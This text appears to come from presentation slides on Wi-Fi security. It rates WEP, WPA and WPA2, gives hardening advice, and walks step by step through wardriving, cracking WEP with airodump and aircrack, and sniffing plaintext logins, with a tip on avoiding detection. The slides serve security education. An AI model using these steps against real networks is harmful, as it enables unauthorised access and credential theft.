  • 43. PMK Key-Caching  Skips re-entering of the user credential by storing the host information on the network  Allows client to become authenticated with an AP before moving to it  Useful in encrypted VoIP over Wi-Fi  Fast Roaming
  • 44. Conclusion  WEP = Dead Meat  WPA-PSK = Potentially Insecure  WPA + 802.1x (Secure EAP) = Secure  WPA2-PSK = Potentially Insecure  WPA2 + 802.1x = Very Secure
  • 45. Suggested Practice  Hide SSID  Do NOT use WEP  Use WPA-PSK with a good pass-phrase  or Use WPA with 802.1x if possible  Get WPA2 certified product for your next purchase
  • 46. tinyPEAP (1)  A self contained PEAP enabled RADIUS server  Currently available in Linksys WRT54G/GS router and Win32 binary  Native Windows XP SP1 support  Web-based user management  The easiest and the most secure solution available in consumer level
  • 49. Survey (2)  Ready to reconfigure your wireless network?
  • 50.
  • 51. Links to the tools used:  Airsnort http://airsnort.shmoo.com  Netstumbler http://www.netstumbler.com  Ethereal http://www.ethereal.com  tinyPEAP http://www.tinypeap.com
  • 52. Papers and Wireless Security Web Pages  Weaknesses in the Key Scheduling Algorithm of RC4  The Unofficial 802.11 Security Web Page  Wireless Security Blackpaper  The IEEE 802.11 specifications (includes WEP spec)  Paper on detecting Netstumbler and similar programs  Further reading on upcoming 802.11 variations  Assorted 802.11 related crypto algorithms written in ANSI C
  • 53. An exercise in wireless insecurity  Tools used:  Laptop w/ 802.11a/b/g card  GPS  Netstumbler  Aircrack (or any WEP cracking tool)  Ethereal  the car of your choice
  • 54. Step1: Find networks to attack  An attacker would first use Netstumbler to drive around and map out active wireless networks  Using Netstumbler, the attacker locates a strong signal on the target WLAN  Netstumbler not only has the ability to monitor all active networks in the area, but it also integrates with a GPS to map AP’s
  • 56. Step 2: Choose the network to attack  At this point, the attacker has chosen his target; most likely a business  Netstumbler can tell you whether or not the network is encrypted  Also, start Ethereal to look for additional information. This time……. Your target is GTwireless
  • 57. Step3: Analyzing the Network  WLAN has no broadcasted SSID  Netstubmler tells me that SSID is GTwireless  Multiple access points  Open authentication method  WLAN is encrypted with 40bit WEP  WLAN is not using 802.1X (WEB-auth)
  • 58. Step4: Cracking the WEP key  Attacker sets NIC drivers to Monitor Mode  Begins capturing packets with Airodump  Airodump quickly lists the available network with SSID and starts capturing packets.  After a few hours of airodump session, launch aircrack to start cracking!  WEP key for GTwireless is revealed!
  • 59. Step5: Sniffing the network  Once the WEP key is cracked and the NIC is configured appropriately, the attacker is assigned an IP, and can access the WLAN  However, a secure proxy with an SSL enabled web based login prevents access to the rest of network and the Internet  Attacker begins listening to traffic with Ethereal
  • 60. Step6: Sniffing continued…  Sniffing a WLAN is very fruitful because everyone on the WLAN is a peer, therefore you can sniff every wireless client  Listening to connections with plain text protocols (in this case FTP, POP, Telnet) to servers on the wired LAN yielded 2 usable logins within 1.5hrs
  • 61. What was accomplished?  Complete access to the WLAN  Complete access to the wired LAN  Complete access to the internet  Access to servers on the wired LAN using the sniffed accounts  Some anonymity. Usage of Netstumbler and other network probing devices can be detected. Skip that step if possible.
  • 62. Other possibilities  Instead of sniffing a valid login, the attacker could have exploited a known vulnerability in the proxy (provided there is one)  The greater risk for being noticed, something an attacker does not want
  • 63. That’s it…the network is compromised  As long as WEP is in place, such attack is always possible  Sadly, many are less secure  How about yours?